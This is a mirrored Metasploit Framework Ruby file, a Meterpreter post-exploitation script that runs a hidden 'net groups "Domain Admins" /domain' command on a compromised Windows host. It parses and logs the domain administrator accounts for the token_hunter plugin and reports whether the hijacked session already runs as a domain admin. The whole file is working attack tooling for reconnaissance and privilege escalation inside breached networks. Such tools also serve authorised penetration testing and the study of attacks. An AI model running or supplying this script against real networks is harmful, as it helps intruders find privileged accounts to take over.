mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-11-12 11:52:01 +01:00
7d665e8a8d
git-svn-id: file:///home/svn/framework3/trunk@10277 4d416f70-5f16-0410-b530-b9f4589650da
81 lines
2.7 KiB
Ruby
81 lines
2.7 KiB
Ruby
# $Id$
|
|
# $Revision$
|
|
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
|
|
#-------------------------------------------------------------------------------
|
|
#Options and Option Parsing
|
|
opts = Rex::Parser::Arguments.new(
|
|
"-h" => [ false, "Help menu." ]
|
|
)
|
|
|
|
opts.parse(args) { |opt, idx, val|
|
|
case opt
|
|
when "-h"
|
|
print_line "Meterpreter Script for extracting Doamin Admin Account list for use."
|
|
print_line "in token_hunter plugin and verifies if current account for session is"
|
|
print_line "is a member of such group."
|
|
print_line(opts.usage)
|
|
raise Rex::Script::Completed
|
|
end
|
|
}
|
|
|
|
def unsupported
|
|
print_error("This version of Meterpreter is not supported with this Script!")
|
|
raise Rex::Script::Completed
|
|
end
|
|
#-------------------------------------------------------------------------------
|
|
#Set General Variables used in the script
|
|
@client = client
|
|
users = ""
|
|
list = []
|
|
host = @client.sys.config.sysinfo['Computer']
|
|
current_user = client.sys.config.getuid.scan(/\S*\\(.*)/)
|
|
domain = @client.fs.file.expand_path("%USERDOMAIN%")
|
|
# Create Filename info to be appended to downloaded files
|
|
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
|
|
platform = client.platform.scan(/(win32|win64|php)/)
|
|
unsupported if not platform
|
|
# Create a directory for the logs
|
|
logs = ::File.join(Msf::Config.log_directory, 'scripts','domain_admins')
|
|
# Create the log directory
|
|
::FileUtils.mkdir_p(logs)
|
|
#logfile name
|
|
dest = logs + "/" + host + filenameinfo + ".txt"
|
|
print_status("found users will be saved to #{dest}")
|
|
|
|
################## MAIN ##################
|
|
#Run net command to enumerate users and verify that it ran successfully
|
|
cmd = 'net groups "Domain Admins" /domain'
|
|
r = @client.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
|
|
while(d = r.channel.read)
|
|
users << d
|
|
if d=~/System error/
|
|
print_error("Could not enumerate Domain Admins!")
|
|
raise Rex::Script::Completed
|
|
end
|
|
break if d == ""
|
|
end
|
|
#split output in to lines
|
|
out_lines = users.split("\n")
|
|
#Select only those lines that have the usernames
|
|
a_size = (out_lines.length - 8)
|
|
domadmins = out_lines.slice(6,a_size)
|
|
#get only the usernames out of those lines
|
|
domainadmin_user_list = []
|
|
domadmins.each do |d|
|
|
d.split(" ").compact.each do |s|
|
|
domainadmin_user_list << s.strip if s.strip != "" and not s =~ /----/
|
|
end
|
|
end
|
|
#process accounts found
|
|
print_status("Accounts Found:")
|
|
domainadmin_user_list.each do |u|
|
|
print_status("\t#{domain}\\#{u}")
|
|
file_local_write(dest, "#{domain}\\#{u}")
|
|
list << u.downcase
|
|
end
|
|
if list.index(current_user.join.chomp.downcase)
|
|
print_status("Current sessions running as #{domain}\\#{current_user.join.chomp} is a Domain Admin!!")
|
|
else
|
|
print_error("Current session running as #{domain}\\#{current_user.join.chomp} is not running as Domain Admin")
|
|
end
|